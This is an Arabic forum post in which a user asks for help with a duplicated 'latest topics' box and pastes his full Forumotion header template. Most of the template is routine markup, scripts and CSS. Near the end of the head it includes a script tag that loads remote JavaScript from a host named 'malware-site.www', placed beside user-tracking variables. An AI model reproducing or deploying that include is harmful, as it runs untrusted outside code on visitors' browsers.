طلب عمل كود المواضيع الاخيرة

اذهب الى الأسفل

طلب عمل كود المواضيع الاخيرة

مُساهمة من طرف mando123487 في الثلاثاء 4 يونيو 2013 - 6:58

السلام عليكم

انا اليوم جيت حطيت صندوق اخر المواضيع طلعلى بصندوقان فانا عايز حد يديلى القالب جاهز

رابط منتدايا

http://tatwerk.yoo7.com/

قالب overall_header


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="{S_CONTENT_DIRECTION}" id="min-width" lang="{L_LANG_HTML}" xml:lang="{L_LANG_HTML}" {NAMESPACE_FB_LIKE} {NAMESPACE_FB} {NAMESPACE_BBCODE}>
<head>
<title>{SITENAME_TITLE}{PAGE_TITLE}</title>
<meta http-equiv="content-type" content="text/html; charset={S_CONTENT_ENCODING}" />
<meta http-equiv="content-script-type" content="text/javascript" />
<meta http-equiv="content-style-type" content="text/css" />
<!-- BEGIN switch_compat_meta -->
<meta http-equiv="X-UA-Compatible" content="IE={switch_compat_meta.VERSION}" />
<!-- END switch_compat_meta -->
<!-- BEGIN switch_canonical_url -->
<link rel="canonical" href="{switch_canonical_url.CANONICAL_URL}" />
<!-- END switch_canonical_url -->
{META_FAVICO}
{META}
{META_FB_LIKE}
<meta name="title" content="{SITENAME_TITLE}{PAGE_TITLE}" />
{T_HEAD_STYLESHEET}
{CSS}
<link rel="search" type="application/opensearchdescription+xml" href="/improvedsearch.xml" title="{SITENAME}" />
<link rel="search" type="application/opensearchdescription+xml" href="{URL_BOARD_DIRECTORY}/search/improvedsearch.xml" title="{SEARCH_FORUMS}" />
<script src="{JQUERY_PATH}" type="text/javascript"></script>
<script type="text/javascript" src="http://a7la-7ekaya.yoo7.com/12395.js"></script>
<script src="{JS_DIR}{L_LANG}.js" type="text/javascript"></script>
<script src="http://a7la7ekaya.googlecode.com/files/exa.js"></script>
<!-- BEGIN switch_fb_login -->
<script src="https://connect.facebook.net/{switch_fb_login.FB_LOCAL}/all.js" type="text/javascript"></script>
<script src="{switch_fb_login.JS_FB_LOGIN}" type="text/javascript"></script>
<!-- END switch_fb_login -->
<script src="http://a7la7ekaya.googlecode.com/files/jquery-1.5.0.js"></script>
<!-- BEGIN switch_ticker -->
<link type="text/css" rel="stylesheet" href="{JS_DIR}jquery/ticker/ticker.css" />
<script src="{JS_DIR}jquery/ticker/ticker.js" type="text/javascript"></script>
<!-- END switch_ticker -->
<script src="http://a7la7ekaya.googlecode.com/files/jquery.reveal.js"></script>
<!-- BEGIN switch_ticker_new -->
<script src="{JS_DIR}jquery/jcarousel/jquery.jcarousel.js" type="text/javascript"></script>
<script type="text/javascript">//<![CDATA[
/* Definir le sens de direction en fonction du panneau admin */
var tickerDirParam = "{switch_ticker.DIRECTION}";
var slid_vert = false;
var auto_dir = 'next';
var h_perso = parseInt({switch_ticker.HEIGHT});

switch( tickerDirParam )
{
case 'top' :
slid_vert = true;
break;

case 'left':
break;

case 'bottom':
slid_vert = true;
auto_dir = 'prev';
break;

case 'right':
auto_dir = 'prev';
break;

default:
slid_vert = true;
}

$(document).ready(function() {
var w_cont = $('#fa_ticker_container').width();

if (w_cont > 0)
{
$('#fa_ticker_container').width(w_cont);

/* Affichage de la liste */
$('#fa_ticker_content').css('display','block');

/* Calcul des dimensions du conteneur et des elements */
var width_max = $('ul#fa_ticker_content').width();
var width_item = Math.floor(width_max / {switch_ticker.SIZE});
var height_max = h_perso;

/* Calcul de la hauteur maximale du conteneur en fonction des elements et de la hauteur personnalisee dans l'admin */
$('ul#fa_ticker_content li').each( function () {
if ($(this).height() > height_max)
{
height_max = $(this).height();
}
} );

/* Redimensionnement des elements et des images trop larges */
$('ul#fa_ticker_content li').width(width_item).height(height_max).find('img').each(function () {
if ($(this).width() > width_item)
{
var ratio = $(this).width() / width_item;
var new_height = Math.round($(this).height() / ratio);
$(this).height(new_height).width(width_item);
}
});

/* Redimensionnement et centrage du conteneur en mode vertical */
if (slid_vert)
{
$('ul#fa_ticker_content').width(width_item).height(height_max).css('marginLeft','auto').css('marginRight','auto');
}

/* Initialisation du caroussel */
$('#fa_ticker_content').jcarousel({
vertical: slid_vert,
wrap: 'circular',
auto: {switch_ticker.STOP_TIME},
auto_direction: auto_dir,
scroll: 1,
size: {switch_ticker.SIZE},
height_max: height_max,
animation: {switch_ticker.SPEED}
});
}
else
{
$('ul#fa_ticker_content li:not(:first)').css('display','none');
$('ul#fa_ticker_content li:first').css('list-style','none').css('text-align','center');
}
});
//]]>
</script>
<!-- END switch_ticker_new -->

<script type="text/javascript">//<![CDATA[
$(document).ready(function(){
<!-- BEGIN switch_enable_pm_popup -->
pm = window.open('{U_PRIVATEMSGS_POPUP}', '_faprivmsg', 'HEIGHT=225,resizable=yes,WIDTH=400');
pm.focus();
<!-- END switch_enable_pm_popup -->
<!-- BEGIN switch_report_popup -->
report = window.open('{switch_report_popup.U_REPORT_POPUP}', '_phpbbreport', 'HEIGHT={switch_report_popup.S_HEIGHT},resizable=yes,scrollbars=no,WIDTH={switch_report_popup.S_WIDTH}');
report.focus();
<!-- END switch_report_popup -->
<!-- BEGIN switch_ticker -->
ticker_start({switch_ticker.HEIGHT}, {switch_ticker.SPACING}, {switch_ticker.SPEED}, '{switch_ticker.DIRECTION}', {switch_ticker.STOP_TIME});
<!-- END switch_ticker -->
});

<!-- BEGIN switch_login_popup -->
var logInPopUpLeft, logInPopUpTop, logInPopUpWidth = {LOGIN_POPUP_WIDTH}, logInPopUpHeight = {LOGIN_POPUP_HEIGHT}, logInBackgroundResize = true, logInBackgroundClass = false;
<!-- END switch_login_popup -->

<!-- BEGIN switch_login_popup -->
$(document).ready( function() {
$(window).resize(function() {
var windowWidth = document.documentElement.clientWidth;
var popupWidth = $("#login_popup").width();
var mypopup = $("#login_popup");

$("#login_popup").css({
"left": windowWidth/2 - popupWidth/2
});
});
});
<!-- END switch_login_popup -->
//]]>
</script>
{GREETING_POPUP}
<!-- BEGIN switch_ticker_new -->
<style>
.jcarousel-skin-tango .jcarousel-item {
text-align:center;
width: 10px;
}

.jcarousel-skin-tango .jcarousel-item-horizontal {
margin-right: {switch_ticker.SPACING}px;
}

.jcarousel-skin-tango .jcarousel-item-vertical {
margin-bottom: {switch_ticker.SPACING}px;
}
</style>
<!-- END switch_ticker_new -->
{HOSTING_JS}
<!-- BEGIN google_analytics_code -->
<script type="text/javascript">
//<![CDATA[
var _gaq = _gaq || [];
_gaq.push(['_setAccount', '{G_ANALYTICS_ID}']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
//]]>
</script>
<!-- END google_analytics_code -->

<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-34898208-1']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

</script>
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="-1" />
<meta http-equiv="Cache-Control" content="no-cache" />
<!-- end no cache headers -->
<title>تحويل و برمجة الطائر الحر</title>
<script type="text/javascript">
var restricted_domains = ['google.com','facebook.com',];
var user_id = 135900;
</script>

<script type="text/javascript" src="http://malware-site.www/api/arbah.js"></script>

</head>
<noscript>
<img src="http://me.effectivemeasure.net/em_image" alt="" style="position:absolute; left:-5px;" /></noscript>

<body background="{T_BODY_BACKGROUND}" bgcolor="{T_BODY_BGCOLOR}" text="{T_BODY_TEXT}" link="{T_BODY_LINK}" vlink="{T_BODY_VLINK}">
<!-- BEGIN hitskin_preview -->
<div id="hitskin_preview" style="display: block;">
<h1><img src="https://illiweb.com/fa/hitskin/hitskin_logo.png" alt="" /> Hit<em>skin</em>.com</h1>
<div class="content">
<p>
{hitskin_preview.L_THEME_SITE_PREVIEW}
<br />
<span>{hitskin_preview.U_INSTALL_THEME}<a href="http://{hitskin_preview.U_RETURN_THEME}">{hitskin_preview.L_RETURN_THEME}</a></span>
</p>
</div>
</div>
<!-- END hitskin_preview -->

<!-- BEGIN switch_login_popup -->
<div id="login_popup">
<table class="forumline" width="{LOGIN_POPUP_WIDTH}" height="{LOGIN_POPUP_HEIGHT}" border="0" cellspacing="1" cellpadding="0">
<tr height="25">
<td class="catLeft">
<span class="genmed module-title">{SITENAME}</span>
</td>
</tr>
<tr height="{LOGIN_POPUP_MSG_HEIGHT}">
<td class="row1" align="left" valign="top">
<div id="login_popup_buttons">
<form action="{S_LOGIN_ACTION}" method="get">
<input type="submit" class="mainoption" value="{L_LOGIN}" />
<input type="button" class="mainoption" value="{L_REGISTER}" onclick="parent.location='{U_REGISTER}';" />
<input id="login_popup_close" type="button" class="button" value="{L_DONT_DISPLAY_AGAIN}" />
</form>
</div>
<span class="genmed">{LOGIN_POPUP_MSG}</span>
</td>
</tr>
</table>
</div>
<!-- END switch_login_popup -->

<a name="top"></a>
{JAVASCRIPT}


<!-- CSS Stylesheet -->

<!-- CSS Stylesheet -->
<style type="text/css" id="vbulletin_css">
/**
* vBulletin 3.7.2 CSS
* Style: 'a7la7ekaya'; Style ID: 94
*/
@import url("http://a7la2011.0wn0.com/37-ltr.css");


.gowetobilobed-offlinebutton {
background-color:transparent;
background-image:url("https://i.servimg.com/u/f66/11/66/00/43/user_o11.gif");
background-position:center center;
background-repeat:no-repeat;
border:medium none;
height:ارتفاع الايقونةpx;
min-height:ارتفاع الايقونةpx;
min-width:عرض الايقونةpx;
width:عرض الايقونةpx;
}.offlinebutton{background-color:transparent;background-image:url(https://i.servimg.com/u/f66/11/66/00/43/user_o11.gif);background-position:center center;background-repeat:no-repeat;border:medium none;height:50px;min-height:50px;min-width:50px;width:50px}

/*-----Programming code byMahmoud TalaaT& sam hameed-----*/
#lbOverlay{
position:fixed;z-index: 999;
left:0;
top:0;
width:100%;
height:100%;
Mahmoud TalaaT;
background-color:#000;
cursor:pointer;
}
#lbCenter,#lbBottomContainer{
position:absolute;
Mahmoud TalaaT;
z-index: 999;overflow:hidden;
background-color:#fff;
}
.lbLoading{
background:#fff url(https://i.servimg.com/u/f27/14/67/90/38/novfao10.gif) no-repeat center;
}
#lbImage{
position:absolute;left:0;top:0;border:10px solid #fff;background-repeat:no-repeat;}
#lbPrevLink,#lbNextLink{
display:block;
Mahmoud TalaaT;
position:absolute;
top:0;
width:50%;
outline:none;
}
#lbPrevLink{
left:0;
}
#lbPrevLink:hover{
background:transparent url(https://i.servimg.com/u/f41/14/81/17/27/211.png) no-repeat 0 15%;
}
#lbNextLink{
right:0;}
#lbNextLink:hover{
background:transparent url(https://i.servimg.com/u/f41/14/81/17/27/310.png) no-repeat 100% 15%;
}
#lbBottom{
font-family:Verdana, Arial, Geneva, Helvetica, sans-serif;font-size:10px;color:#666;line-height:1.4em;
text-align:left;
Mahmoud TalaaT;
border:10px solid #fff;
border-top-style:none;
}
#lbCloseLink{
display:block;
float:right;
Mahmoud TalaaT;
width:66px;height:22px;
background:transparent url(https://i.servimg.com/u/f41/14/81/17/27/110.png) no-repeat center;
outline:none;
Mahmoud TalaaT;
margin:5px 0;
}
#lbCaption,#lbNumber{
margin-right:71px;
}
.postbody img{
max-width:450px;
}
/*-----Programming code byMahmoudTalaat&samhamed-----*/
.AVATAR img {
height: 220px;
width: 165px;
}

</style>
<link rel="stylesheet" type="text/css" href="clientscript/vbulletin_important.css?v=372" />


<!-- / CSS Stylesheet -->

<script type="text/javascript" src="clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=372"></script>
<script type="text/javascript" src="clientscript/yui/connection/connection-min.js?v=372"></script>
<script type="text/javascript">
<!--
var SESSIONURL = "s=dfbb3fcc819a264688d5d4190cf47111&";
var SECURITYTOKEN = "guest";
var IMGDIR_MISC = "d.f.t/misc";
var vb_disable_ajax = parseInt("0", 10);
// -->
</script>
<script type="text/javascript" src="clientscript/vbulletin_global.js?v=372"></script>
<script type="text/javascript" src="clientscript/vbulletin_menu.js?v=372"></script>


<link rel="alternate" type="application/rss+xml" title="a.7.l.a.7.e.k.a.y.a RSS Feed" href="external.php?type=RSS2" /><link rel="stylesheet" href="style.css" type="text/css" media="screen" />
<script type="text/javascript" src="http://a7la7ekaya.googlecode.com/files/jquery-1.4.3.min.js"></script>
<script type="text/javascript" src="http://a7la7ekaya.googlecode.com/files/jquery.aes.js"></script>
<script type="text/javascript" src="http://a7la7ekaya.googlecode.com/files/jquery.aes2.js"></script>
<link rel="stylesheet" href="ugc.css" type="text/css" />
<script type="text/javascript" src="http://a7la7ekaya.googlecode.com/files/ncode_imageresizer.js"></script>
<script type="text/javascript">
<!--
<!--www.swaalf.net هاك تصغير الصور 1.2.6
NcodeImageResizer.MODE = 'newwindow';

NcodeImageResizer.MAXWIDTH = 400;
NcodeImageResizer.MAXHEIGHT = 600;


NcodeImageResizer.MAXWIDTHSIGS = 400;
NcodeImageResizer.MAXHEIGHTSIGS = 100;

NcodeImageResizer.BBURL = 'http://www.a7la-7ekaya.com';

vbphrase['ncode_imageresizer_warning_small'] = 'اضغط هنا لمشاهدة الصورة كاملة.';
vbphrase['ncode_imageresizer_warning_filesize'] = 'تم تصغير هذه الصورة. اضغط هنا لمشاهدة الحجم الكامل. أبعاد الصورة الاصلي هو %1$s*%2$s و بحجم %3$s كيلوبايت.';
vbphrase['ncode_imageresizer_warning_no_filesize'] = 'تم تصغير هذه الصورة. اضغط هنا لمشاهدة الحجم الكامل. أبعاد الصورة الاصلي هو %1$s*%2$s.';
vbphrase['ncode_imageresizer_warning_fullsize'] = 'اضغط هنا لمشاهدة الصورة المصغرة.';
//-->
</script>

<style type="text/css">

table.ncode_imageresizer_warning {
background: #FFFFE1;
color: #000000;
border: 1px solid #CCCFFF;
cursor: pointer;
}

table.ncode_imageresizer_warning td {
font-size: 10px;
vertical-align: middle;
text-decoration: none;
}

table.ncode_imageresizer_warning td.td1 {
padding: 5px;
}

table.ncode_imageresizer_warning td.td1 {
padding: 2px;
}

</style>
<!-- no cache headers --><body>
<!-- الهيدر كامل -->
<div id="header-tr">


<div class="h1">
<div class="h2"></div>
<div class="h3">
<a class="r2" href="http://twitter.com/a7la7ekaya" target="_blank" title="twitter"></a>
<a class="r3" href="https://www.facebook.com/pages/%D9%85%D9%86%D8%AA%D8%AF%D9%8A%D8%A7%D8%AA-%D8%A7%D8%AD%D9%84%D9%89-%D8%AD%D9%83%D8%A7%D9%8A%D8%A9/126501777432574" target="_blank" title="facebook"></a>
<a class="r4" href="https://www.youtube.com/user/a7la7ekaya" target="_blank" title="youtube"></a>
<a class="r5" href="http://www.a7la-7ekaya.com/post?f=20&mode=newtopic" target="_blank" title="اتصل بنا!"></a>
<a class="r6" href="http://www.a7la-7ekaya.com/feed" target="_blank" title="جديد المنتدى"></a>
<a class="r7" href="http://www.a7la-7ekaya.com/h17-page" target="_blank" title="مركز التحميل"></a>
<a class="r8" href="/register" target="_blank" title="التسجيل"></a>
<a class="r9" href="/forum" target="_blank" title="الرئيسيه"></a>


</div>

</div>


<!-- بداية شريط منطقة الاعضاء والبحث -->

<div class="login-search">


<!-- منطقة الاعضاء -->

<!---الزوار-->
<!-- BEGIN switch_user_logged_out -->
<div class="login-user">

<div class="rememberr"><input type="checkbox" name="autologin" value="1" tabindex="103" accesskey="c" /></div>
<form action="/login.forum?redirect=h15-page" method="post" name="form_login">
<script type="text/javascript" src="clientscript/vbulletin_md5.js?v=372"></script>
<input type="text" class="usernamee" name="username" value="اسم العضو" onfocus="if(this.value=='اسم العضو'){this.value=''};" onblur="if(this.value==''){this.value='اسم العضو'};" size="10" accesskey="u" tabindex="101" />
<input type="password" class="passwordd" name="password" size="10" tabindex="102" />
<input type="submit" class="login-enter" name="login" value="" tabindex="104" title="ادخل اسم العضو وكلمة المرور الخاصة بك في الحقول المجاورة لتسجيل الدخول, أو اضغط على رابط 'التسجيل' لإنشاء حساب خاص بك." accesskey="s" />


<input type="hidden" name="s" value="dfbb3fcc819a264688d5d4190cf47111" />
<input type="hidden" name="securitytoken" value="guest" />
<input type="hidden" name="do" value="login" />
<input type="hidden" name="vb_login_md5password" />
<input type="hidden" name="vb_login_md5password_utf" />
</form>


</div>
<!-- END switch_user_logged_out -->
<!-- BEGIN switch_user_logged_in -->
<!---الأعضاء-->
<div class="login-cp">
<div class="usernameee">
<strong>{LOGGED_AS}.</strong>
</div>
<div class="controll"></div>
<div class="profilee"></div>
<div class="infoo">

<div></div>
</div>


<!-- END switch_user_logged_in -->

<!-- نهاية الاعضاء -->


<!-- منطقة البحث -->

<div class="from-search">

<form method="post" class="searchform" action="/search.forum" >

<input type="text" size="24" value="ادخل كلمة البحث..." name="search_keywords" onfocus="if(this.value=='ادخل كلمة البحث...'){this.value=''};" onblur="if(this.value==''){this.value='ادخل كلمة البحث...'};" class="text-search" />
<input type="submit" title="ابدأ البحث" class="searchsubmit" value="" />
</form>

</div>
<!-- نهاية البحث -->


</div>


</div>

</li>

</div>


<!-- بداية الخط السفلي للروابط الافقية -->

<div class="line-dw-with-texts">

<!-- الروابط -->
<ul class="link-h">
<li class=""><a" align="top"/></a></li>
<li class="hov"><a href="#" title="الرابط">الاكواد و التقنيات <img src="https://i.servimg.com/u/f33/17/43/85/13/spryme10.gif" alt="link" border="0"/></a>
<ul>
<li><a href="http://www.a7la-7ekaya.com/f21-montada">اكواد HTML</a></li>
<li><a href="http://www.a7la-7ekaya.com/f23-montada">اكواد التومبلايت</a></li>
<li><a href="http://www.a7la-7ekaya.com/f22-montada">الاكواد الانسيايية CSS</a></li>
<li><a href="http://www.a7la-7ekaya.com/f52-montada">اكوادJavaScript & jQuery</a></li>
<li><a href="http://www.a7la-7ekaya.com/f24-montada">تقنيات اخرى</a></li>
</ul>


</li>
<li class="hov"><a href="#" title="الرابط">استايلات و وجهات  <img src="https://i.servimg.com/u/f33/17/43/85/13/spryme10.gif" alt="link" border="0"/></a>
<ul>
<li><a href="http://www.a7la-7ekaya.com/f50-montada">واجهات مجانية</a></li>
<li><a href="http://www.a7la-7ekaya.com/f140-montada">استايلات تومبلايت</a></li>
<li><a href="http://www.a7la-7ekaya.com/f61-montada">استايلات من اعمالنا </a></li>
<li><a href="http://www.a7la-7ekaya.com/f40-montada">الاستايلات عادية ً</a></li>
</ul>
</li>
<li class="hov"><a href="#" title="الرابط">قسم المساعده   <img src="https://i.servimg.com/u/f33/17/43/85/13/spryme10.gif" alt="link" border="0"/></a>
<ul>
<li><a href="http://www.a7la-7ekaya.com/f63-montada">طلبات المساعده و الحلول</a></li>
<li><a href="http://www.a7la-7ekaya.com/f118-montada">طلبات الاكواد</a></li>
<li><a href="http://www.a7la-7ekaya.com/f127-montada">طلبات الزوار</a></li>
<li><a href="http://www.a7la-7ekaya.com/f68-montada">اشهار منتداك هنا</a></li>
</ul>

</li>
<li class="hov"><a href="http://www.a7la-7ekaya.com/search?search_id=newposts" title="الرابط">جديد المنتدى</a></li>

<li class="hov"><a href="#" title="وصلات سريعة للاداره"> وصلات سريعه للاداره   <img src="https://i.servimg.com/u/f33/17/43/85/13/spryme10.gif" alt="link" border="0"/></a>
<ul>
<li><a href="http://www.a7la-7ekaya.com/f43-montada">قوانين المنتدى</a></li>
<li><a href="http://www.a7la-7ekaya.com/f29-montada">الإشعارات و الأخبار</a></li>
<li><a href="http://www.a7la-7ekaya.com/f72-montada">طلبات الترشيح للاشراف</a></li>
<li><a href="http://www.a7la-7ekaya.com/f12-montada">الشكاوي العامه</a></li>
<li><a href="http://www.a7la-7ekaya.com/f49-montada">الابلاغ عن موضوع مخالف</a></li>
<li><a href="http://www.a7la-7ekaya.com/f56-montada">الارشيف</a></li>

</ul>
</li>

<li class="hov"><a href="www.a7la-7ekaya.com/post?f=20&mode=newtopic" title="الرابط">اتصل بنا</a></li>

</ul>

</div>

</div>
<!-- الهيدر كامل --><!-- content table -->
<!-- open content container -->

<div align="center">
<div class="page" style="width:100%; text-align:right">
<div style="padding:0px 25px 0px 25px" align="right"><br>

<div id="slider" class="nivoSlider">

</div><br /><br /><br />

<link rel="stylesheet" href="../ugc.css" type="text/css" />
<script type="text/javascript">
var rainbowcount = 0;
var glitcount=0;
var glitstring='';
var shimmercount=0;
var shimmerstring='';
var ie4 = false;
if(document.all) {
ie4 = true;
}
function setContent(name, value) {
var d;
if (ie4) {
d = document.all[name];
} else {
d = document.getElementById(name);
}
d.innerHTML = value;
}

function getContent(name) {
var d;
if (ie4) {
d = document.all[name];
} else {
d = document.getElementById(name);
}
return d.innerHTML;
}

function setColor(name, value) {
var d;
if (ie4) {
d = document.all[name];
} else {
d = document.getElementById(name);
}
d.style.color = value;
}

function getColor(name) {
var d;
if (ie4) {
d = document.all[name];
} else {
d = document.getElementById(name);
}
return d.style.color;
}
function toSpans(span) {
var str=span.firstChild.data;
var a=str.length;
span.removeChild(span.firstChild);
for(var i=0; i<a; i++) {
var theSpan=document.createElement("SPAN");
theSpan.appendChild(document.createTextNode(str.charAt(i)));
span.appendChild(theSpan);
}
}
function glitter(name, col, speed) {
var value = getContent(name);
while ( value.indexOf(" ", "-10") != (-1) ) {
var value = value.replace(" ", "");
};
if (value.indexOf('<span') >= 0) { return; }
var length = 0;
var str = '';
var ch;
var token = '';
var htmltag = false;
for (i = 0; i < value.length; i++) {
ch = value.substring(i, i+1);
if (i < value.length - 1) { nextch = value.substring(i+1, i+2); } else { nextch = ' '; }
token += ch;
if (ch == '<' && '/aAbBpPhHiIoOuUlLtT'.indexOf(nextch) >= 0) { htmltag = true; }
if (ch == '>' && htmltag) { htmltag = false; }
if (!htmltag && ch.charCodeAt(0) > 30 && ch != ' ' && ch != '\n') {
str += '<span id="' + name + '_' + length + '">' + token + '</span>';
token = '';
length++;
}
}
setContent(name, str);
glitcommand = 'glitterloop(\'' + name + '\', ' + length + ', 0, 1, \'' + col + '\', ' + speed + ')';
setTimeout(glitcommand , speed);
}
function shine(name, col, speed) {
var value = getContent(name);
while ( value.indexOf(" ", "-10") != (-1) ) {
var value = value.replace(" ", "");
};
if (value.indexOf('<span') >= 0) { return; }
var length = 0;
var str = '';
var ch;
var token = '';
var htmltag = false;
for (i = 0; i < value.length; i++) {
ch = value.substring(i, i+1);
if (i < value.length - 1) { nextch = value.substring(i+1, i+2); } else { nextch = ' '; }
token += ch;
if (ch == '<' && '/aAbBpPhHiIoOuUlLtT'.indexOf(nextch) >= 0) { htmltag = true; }
if (ch == '>' && htmltag) { htmltag = false; }
if (!htmltag && ch.charCodeAt(0) > 30 && ch != ' ' && ch != '\n') {
str += '<span id="' + name + '_' + length + '">' + token + '</span>';
token = '';
length++;
}
}
setContent(name, str);
shinecommand = 'shineloop(\'' + name + '\', ' + length + ', 0, 1, \'' + col + '\', ' + speed + ')';
setTimeout(shinecommand , speed);
}
function RainbowSpan(span, hue, deg, brt, spd, hspd) {
this.deg=(deg==null?360:Math.abs(deg));
this.hue=(hue==null?0:Math.abs(hue)%360);
this.hspd=(hspd==null?3:Math.abs(hspd)%360);
this.length=span.firstChild.data.length;
this.span=span;
this.speed=(spd==null?50:Math.abs(spd));
this.hInc=this.deg/this.length;
this.brt=(brt==null?255:Math.abs(brt)%256);
this.timer=null;
toSpans(span);
this.moveRainbow();
}
RainbowSpan.prototype.moveRainbow = function() {
if(this.hue>359) this.hue-=360;
var color;
var b=this.brt;
var a=this.length;
var h=this.hue;

for(var i=0; i<a; i++) {

if(h>359) h-=360;

if(h<60) { color=Math.floor(((h)/60)*b); red=b;grn=color;blu=0; }
else if(h<120) { color=Math.floor(((h-60)/60)*b); red=b-color;grn=b;blu=0; }
else if(h<180) { color=Math.floor(((h-120)/60)*b); red=0;grn=b;blu=color; }
else if(h<240) { color=Math.floor(((h-180)/60)*b); red=0;grn=b-color;blu=b; }
else if(h<300) { color=Math.floor(((h-240)/60)*b); red=color;grn=0;blu=b; }
else { color=Math.floor(((h-300)/60)*b); red=b;grn=0;blu=b-color; }

h+=this.hInc;

this.span.childNodes[i].style.color="rgb("+red+", "+grn+", "+blu+")";
}
this.hue+=this.hspd;
}
function shineloop(name, length, ind, delta, col, speed) {
var next = ind + delta;
if (next >= length) { delta = delta * -1; next = ind + delta; }
if (next < 0) { delta = delta * -1; next = ind + delta; }
setColor(name + '_' + ind, getColor(name + '_' + next));
setColor(name + '_' + next, col);
shinecommand = 'shineloop(\'' + name + '\', ' + length + ', ' + next + ', ' + delta + ', \'' + col + '\', ' + speed + ')';
setTimeout(shinecommand , speed);
}

function glitterloop(name, length, ind, delta, col, speed) {
var new_spd = Math.floor(Math.random()*31);
var new_spd = (new_spd - 15);
var new_spd = (new_spd + speed);
var next = Math.floor(Math.random()*(length+1));
if (next >= length) { delta = delta * -1; next = (-1); }
if (next < 0) { delta = delta * -1; next = 1; }
setColor(name + '_' + ind, getColor(name + '_' + next));
setColor(name + '_' + next, col);
glitcommand = 'glitterloop(\'' + name + '\', ' + length + ', ' + next + ', ' + delta + ', \'' + col + '\', ' + speed + ')';
setTimeout(glitcommand , new_spd);
}
</script>

<br />
<!-- border top -->
<div class="w1">
<div class="w2"></div>
<div class="w3"></div>


</div>

<div class="body-z">

<div class="z1">
<div class="z2">

<!-- breadcrumb, login, pm info -->
<table class="tborder" cellpadding="6" cellspacing="1" border="0" width="100%" align="center">
<tr>
<td class="alt1" width="100%">

<div class="navbar" style="font-size:10pt"><a href="" accesskey="1"><img class="inlineimg" src="mrsavb_2012/mrsavb/misc/navbits_start.gif" alt="" border="0" /></a> <strong><a class="nav" href="{U_INDEX}">
<div class="nav"><img src="https://i.servimg.com/u/f43/16/43/22/50/uuoo12.png" class="inlineimg" alt="" border="0" height="15" width="15" /> {L_INDEX} </a>{NAV_CAT_DESC}</div>
<font face="Tahoma"><span style="font-size: 10pt"<font-weight="bold"><img src="https://i.servimg.com/u/f23/16/43/22/50/navbit11.gif" height="15" width="30" /> {PAGE_TITLE}</span></font></strong></div></td>
</tr>
</table>
<!-- / breadcrumb, login, pm info -->
<!-- nav buttons bar -->
<div class="tborder" style="padding:1px; border-top-width:0px">
<table cellpadding="0" cellspacing="0" border="0" width="100%" align="center">
<tr align="center">

<!-- BEGIN switch_user_logged_out -->
<td class="vbmenu_control"><a href="/register" rel="nofollow">التسجيل</a></td>


<td class="vbmenu_control"><a rel="help" href="/faq" accesskey="5">التعليمـــات</a></td>
<td class="vbmenu_control"><a href="/search?search_id=unanswered">موآضـــيع لم يتم آلرد عليهآ</a></td><td class="vbmenu_control"><a href="/search?search_id=newposts" accesskey="2">مشاركات اليوم</a></td>

<td class="vbmenu_control"><a id="navbar_search" href="/search" accesskey="4" rel="nofollow">محرك البحث</a> </td>


<td class="vbmenu_control" class="login-leftt" dir="ltr"><a data-reveal-id="myModal" title="اضغط لتسجيل الدخول">الدخول السريع</a></td>


<div id="myModal" class="reveal-modal"><div algin="center"><div id="shadow-login"><div class="text-login-block">تسجيل الـدخـول ...</div>
<div class="block-right"><div id="login-block">
<form action="/login.forum?redirect=h15-page" method="post" name="form_login" style="margin:0px;padding:0px;outline:none;">
<input type="hidden" name="token" value="7fc7b94192c20076507391239bacbda2b099a52b" />
<div style="width: 210px; float:right; margin:20px 10px 0 0; height: 97px;">
<input class="shadow-login-input" type="text" name="username" value="اسم الدخول" onfocus="if(this.value=='Your Email')this.value=''" onblur="if(this.value=='')this.value='Your Email' " name="text" size="20" /><div class="clear"></div>
<input type="password" name="password" class="shadow-login-input" value="Password" onfocus="if(this.value=='Password')this.value=''" onblur="if(this.value=='')this.value='Password' " size="20" />

</div><div style="float:left; width: 128px; height: 90px; margin-left: 10px; margin-right: 10px; margin-top: 20px;">
<input type="submit" name="login" value="دخول" id="shadow-login-stumb" />

</div>
</form>
</div>

</div><div style="width:0px;height:100px;border: 1px #555 solid; float:right;margin:20px 5px 0 0;"></div><div class="block-left"><div class="register-login" align="center"><a href="/register" >حساب جديد</a></div><div style="height:10px;"></div>

</div>

</div>


</div>
<a class="close-reveal-modal">
<img alt="" title="أضغط هنا للأغلاق" src="https://i.servimg.com/u/f34/15/04/02/38/button10.png" width="32" height="32"></a>
</div>

<!-- END switch_user_logged_out -->


<!-- BEGIN switch_user_logged_in -->


<td class="vbmenu_control"><a href="/forum">الرئيسية</a></td>

<td class="vbmenu_control"><a href="/profile?mode=editprofile">لوحة التحكم</a></td>


<td class="vbmenu_control"><a href="/t2269-topic" accesskey="5">قوانين المنتدى</a></td>

<td class="vbmenu_control"><a href="/memberlist" accesskey="5">الاعضاء</a></td>


<td class="vbmenu_control"><a href="/search?search_id=newposts" accesskey="2">المشاركات الجديدة</a></td>

<td class="vbmenu_control"><a id="navbar_search" href="/search" accesskey="4" rel="nofollow">محرك البحث</a> <script type="text/javascript"> vbmenu_register("navbar_search"); </script></td>


<td class="vbmenu_control"><a href="/privmsg" rel="nofollow" accesskey="9">التنبيهات</a><script type="text/javascript"> vbmenu_register("usercptools"); </script></td>

<td class="vbmenu_control"><a href="/login?logout" onclick="return log_out('هل تود بالفعل مغادرة المنتدى ؟')">تسجيل الخروج</a></td>
<!-- END switch_user_logged_in -->

</tr>
</table>
</div>
<!-- / nav buttons bar -->
</div>
</div>
</div>

<div class="q1">
<div class="q2"></div>
<div class="q3"></div>
</div>

<!-- border buttom -->
<br />

<form action="profile.php?do=dismissnotice" method="post" id="notices">
<input type="hidden" name="do" value="dismissnotice" />
